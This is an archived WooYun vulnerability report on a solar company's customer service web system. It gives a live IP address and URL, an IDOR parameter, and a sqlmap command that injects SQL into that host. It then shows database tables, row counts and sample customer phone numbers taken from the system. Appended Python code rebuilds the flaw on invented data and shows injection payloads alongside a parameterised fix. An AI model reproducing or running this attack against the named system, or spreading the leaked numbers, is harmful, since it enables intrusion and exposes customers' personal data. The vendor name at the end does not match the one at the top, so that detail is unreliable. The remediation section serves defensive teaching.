WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public.
2015-11-24: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
Anyway, I don't use a solar water heater myself.
亿家能 (Yijianeng) Solar customer service system
http://218.56.138.156:8080/web/manager/
There is an unauthorised-access (IDOR) URL:
http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456
The agentNo parameter can be changed to any value and the servlet returns that agent's records without checking that the caller is entitled to them. The same parameter is also a SQL injection point:
sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs
The current database is ecs.
Listing the tables with their row counts:
Database: ecs
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.chanpinxinxi               | 1232569 |
| dbo.salebill                   | 989634  |
| dbo.fahuoxinxi                 | 971554  |
| dbo.vistorBack                 | 518859  |
| dbo.building                   | 515518  |
| dbo.ProductSwap                | 407312  |
| dbo.UserTable                  | 212813  |
| dbo.callerWorkStat             | 150036  |
| dbo.LinkTelArea                | 138625  |
| dbo.telInfo                    | 138280  |
| dbo.AssessmentFactorInfo       | 42993   |
| dbo.SettleAccountsItems        | 36245   |
| dbo.HistorySettleAccountsItems | 17834   |
| dbo.Tmp                        | 16654   |
| dbo.xilieinfo                  | 7161    |
| dbo.city                       | 3238    |
| dbo.UserRole                   | 2595    |
| dbo.refer                      | 2584    |
| dbo.Pd_Process                 | 2582    |
| dbo.pd                         | 2484    |
| dbo.v_goods                    | 2445    |
+--------------------------------+---------+
Work-order follow-up (customer callback) table: vistorBack
Listing its columns:
Table: vistorBack
[32 columns]
+------------------+---------+
| Column           | Type    |
+------------------+---------+
| AgentNo          | varchar |
| BuildingResult   | varchar |
| callTel          | varchar |
| Card             | varchar |
| content          | varchar |
| firstVistorDate  | varchar |
| Id               | bigint  |
| Isbw             | int     |
| IsDel            | varchar |
| Isgd             | int     |
| Ispj             | int     |
| IsVisitor        | varchar |
| LeaveBillNo      | varchar |
| LeaveBillNo2     | varchar |
| memom            | varchar |
| openTime         | varchar |
| operateDate      | varchar |
| other            | varchar |
| Province         | varchar |
| Reason           | varchar |
| require          | varchar |
| satisfaction     | varchar |
| secondVistorDate | varchar |
| ServiceType      | varchar |
| thirdVistorDate  | varchar |
| verify           | int     |
| verifyContent    | varchar |
| verifyDate       | varchar |
| verifyPerson     | varchar |
| verifyValidate   | int     |
| VistorTime       | varchar |
| zt               | varchar |
+------------------+---------+
This table holds customer information. Sample rows from the phone number column (callTel):
Database: ecs
Table: vistorBack
[4 entries]
+--------------+
| callTel      |
+--------------+
| 051683202555 |
| 83686959     |
| 85696735     |
| 87792024     |
+--------------+
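The two defects above, the missing ownership check on agentNo and the injectable agentNo, usually share one root cause: the request parameter is dropped straight into the SQL text and nothing compares it with the authenticated user. The following is an added example, not code from the report or from the vendor's system. It assumes a reconstruction of the servlet's query (the real code is not public) and uses an in-memory SQLite copy of a cut-down vistorBack table whose rows are constructed for the example; only the column names come from the report. It shows the IDOR and the injection against the vulnerable pattern, the boolean probe sqlmap automates, and the fixed version with an object-level authorisation check plus a parameterised query.

```python
import sqlite3

# Constructed sample rows for a cut-down vistorBack table. The column names
# (AgentNo, callTel) come from the report's column list; the values below are
# invented for this example and are not data from the real system.
SAMPLE_ROWS = [
    ("123456", "0516-0000001"),
    ("123456", "0516-0000002"),
    ("654321", "0532-0000003"),
    ("654321", "0532-0000004"),
    ("777777", "0533-0000005"),
]


def make_db():
    """Build an in-memory SQLite stand-in for the ecs.dbo.vistorBack table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vistorBack (Id INTEGER PRIMARY KEY, AgentNo TEXT, callTel TEXT)"
    )
    conn.executemany("INSERT INTO vistorBack (AgentNo, callTel) VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, agent_no):
    """Assumed reconstruction of the handler behind
    /web/servlet/vistor?type=vistorBuilding&agentNo=...: the request parameter is
    concatenated into the SQL text (injection) and nothing checks that the caller
    may see that agent's records (IDOR)."""
    sql = "SELECT callTel FROM vistorBack WHERE AgentNo = '" + agent_no + "'"
    return [row[0] for row in conn.execute(sql)]


def boolean_probe(conn, agent_no):
    """The boolean-based check sqlmap automates: append a true and a false tail
    condition; if the row counts differ, the parameter is being interpreted as SQL."""
    true_case = vulnerable_lookup(conn, agent_no + "' AND '1'='1")
    false_case = vulnerable_lookup(conn, agent_no + "' AND '1'='2")
    return len(true_case) != len(false_case)


class Forbidden(Exception):
    """Raised when a caller asks for records that are not theirs."""


def hardened_lookup(conn, session_agent_no, requested_agent_no):
    """Fixed version: object-level authorisation first, then a parameterised query.
    session_agent_no is what the server knows about the authenticated user;
    requested_agent_no is the untrusted value from the query string."""
    if requested_agent_no != session_agent_no:
        raise Forbidden("agentNo does not belong to the authenticated agent")
    rows = conn.execute(
        "SELECT callTel FROM vistorBack WHERE AgentNo = ?", (requested_agent_no,)
    )
    return [row[0] for row in rows]


def is_denied(conn, session_agent_no, requested_agent_no):
    """True when hardened_lookup refuses the request."""
    try:
        hardened_lookup(conn, session_agent_no, requested_agent_no)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("own records:    ", vulnerable_lookup(db, "123456"))
    print("other agent:    ", vulnerable_lookup(db, "654321"))       # IDOR
    print("dump everything:", vulnerable_lookup(db, "' OR '1'='1"))  # injection
    print("injectable?     ", boolean_probe(db, "123456"))
    print("hardened, own:  ", hardened_lookup(db, "123456", "123456"))
    print("hardened, other denied:", is_denied(db, "123456", "654321"))
    # With a bound parameter the payload is just a literal that matches no agent.
    print("hardened, payload:", hardened_lookup(db, "' OR '1'='1", "' OR '1'='1"))
```

In the hardened version the query-string agentNo is redundant once the server keys the query on the session's own identity; keeping the parameter only makes sense if it is compared against the session value, as above, or dropped altogether. The bound parameter is what stops the injection: the `' OR '1'='1` tail is compared as a string against AgentNo and matches nothing.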
皇明 (Himin) Solar customer service system
Vendor response: the vendor could not be reached, or the vendor actively refused to respond.
Vulnerability rank: 15 (WooYun rating)